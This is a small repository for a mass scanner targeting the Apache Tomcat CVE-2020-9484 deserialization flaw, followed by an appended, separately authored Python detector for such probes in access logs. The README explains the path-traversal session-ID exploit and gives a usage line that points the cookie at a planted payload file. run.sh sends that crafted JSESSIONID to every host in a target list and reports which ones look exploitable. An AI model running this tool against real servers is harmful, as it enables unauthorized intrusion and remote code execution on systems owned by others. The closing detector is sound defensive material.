├── README.md
└── run.sh

/README.md:
--------------------------------------------------------------------------------
## CVE-2020-9484-Mass-Scan
CVE-2020-9484 mass scanner: scans a list of URLs for the Apache Tomcat deserialization vulnerability (CVE-2020-9484), which can lead to RCE, and reports hosts that look vulnerable.

```
The web application will return HTTP 500 error upon exploitation, because it encounters a malicious serialized object instead of one that contains session information as it expects.
```

```
The Exploit:
Tomcat requests the Manager to check if a session with session ID "../../../../../../tmp/12345" exists.
It will first check if it has that session in memory.
It does not. But the currently running Manager is a PersistentManager, so it will also check if it has the session on disk.
It will check at location directory + sessionid + ".session", which evaluates to "./session/../../../../../../tmp/12345.session".
If the file exists, it will deserialize it and parse the session information from it.
```

Source: https://www.redtimmy.com/java-hacking/apache-tomcat-rce-by-deserialization-cve-2020-9484-write-up-and-exploit/

`targets.txt`

```
https://example.com
http://example:8080
http://example.com/
```

[Vuln Docker + PoC](https://github.com/masahiro331/CVE-2020-9484)

```
./run.sh targets.txt ../../../../../usr/local/tomcat/groovy > result.txt
```

```
grep "SUCCESS" result.txt
```

## References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9484

https://meterpreter.org/cve-2020-9484-apache-tomcat-remote-code-execution-vulnerability-alert/

https://github.com/masahiro331/CVE-2020-9484

https://www.redtimmy.com/java-hacking/apache-tomcat-rce-by-deserialization-cve-2020-9484-write-up-and-exploit/

--------------------------------------------------------------------------------
/run.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Usage: ./run.sh targets.txt <session-id-value>
#   $1 - file with one base URL per line
#   $2 - value sent as the JSESSIONID cookie

# Read line by line (handles URLs with unusual characters and a missing final newline).
while IFS= read -r url || [ -n "$url" ]; do
    # Skip blank lines in the target list.
    [ -z "$url" ] && continue

    # First request: only the HTTP status code is needed.
    code=$(curl --connect-timeout 3.37 -sL -o /dev/null -w '%{http_code}' \
        -H "Cookie: JSESSIONID=$2" "$url/index.jsp")

    if [ "$code" = "500" ]; then
        # A 500 whose body mentions "java" looks like a deserialization error page.
        if curl --connect-timeout 3.37 -sL -H "Cookie: JSESSIONID=$2" "$url/index.jsp" | grep -q "java"; then
            echo "$url SUCCESS"
        else
            echo "$url RESPONSE500"
        fi
    else
        echo "$url xNOTVULNERABLE"
    fi
done < "$1"
--------------------------------------------------------------------------------
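The README describes the two observable traits of a CVE-2020-9484 probe against a server: a `JSESSIONID` cookie carrying a path traversal sequence, and an HTTP 500 response when the server tries to deserialize the referenced file. The following detector, written as an added example for this page rather than code from this repository, turns that into a log check. It assumes Tomcat's `AccessLogValve` was configured with a pattern that appends the session cookie value via `%{JSESSIONID}c` (the stock `common` pattern does not log cookies); the log lines below are constructed samples.

```python
"""Flag CVE-2020-9484-style probes in Tomcat access logs (added example).

Assumed AccessLogValve pattern (not the Tomcat default):
    %h %l %u %t "%r" %s %b "%{JSESSIONID}c"
"""
import re
import urllib.parse
from typing import Dict, List, Optional

# Constructed sample log: one normal session, two traversal attempts
# (plain and URL-encoded) that produced HTTP 500, and one request without a cookie.
SAMPLE_LOG = """\
203.0.113.5 - - [20/May/2020:10:01:12 +0000] "GET /index.jsp HTTP/1.1" 200 1532 "A1B2C3D4E5F60718293A4B5C6D7E8F90"
203.0.113.9 - - [20/May/2020:10:01:13 +0000] "GET /index.jsp HTTP/1.1" 500 2048 "../../../../../../tmp/12345"
203.0.113.9 - - [20/May/2020:10:01:14 +0000] "GET /index.jsp HTTP/1.1" 500 2048 "..%2F..%2F..%2F..%2Ftmp%2F12345"
198.51.100.2 - - [20/May/2020:10:02:00 +0000] "GET /index.jsp HTTP/1.1" 404 310 "-"
"""

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<jsessionid>[^"]*)"$'
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one access log line; return None for lines that do not match the pattern."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_traversal_session_id(value: str) -> bool:
    """True if the cookie value looks like a file path rather than a session ID.

    A legitimate Tomcat session ID never contains '..', '/' or '\\'. The value is
    URL-decoded twice so that single- and double-encoded separators are caught.
    """
    if value in ("", "-"):
        return False
    decoded = urllib.parse.unquote(urllib.parse.unquote(value))
    return ".." in decoded or "/" in decoded or "\\" in decoded


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per request whose JSESSIONID carries traversal characters.

    Severity is 'high' when the server also answered 500, the symptom the README
    describes for a deserialization attempt, and 'medium' otherwise.
    """
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        sid = rec["jsessionid"]
        if not is_traversal_session_id(sid):
            continue
        findings.append({
            "host": rec["host"],
            "time": rec["time"],
            "status": rec["status"],
            "jsessionid": sid,
            "severity": "high" if rec["status"] == "500" else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity'].upper():6} {f['host']} {f['status']} JSESSIONID={f['jsessionid']}")
```

Lines that do not match the assumed pattern are skipped rather than guessed at, so the check is only as good as the valve configuration; if cookies are not logged, the same traversal test can be applied to the `JSESSIONID` value at a reverse proxy or WAF in front of Tomcat.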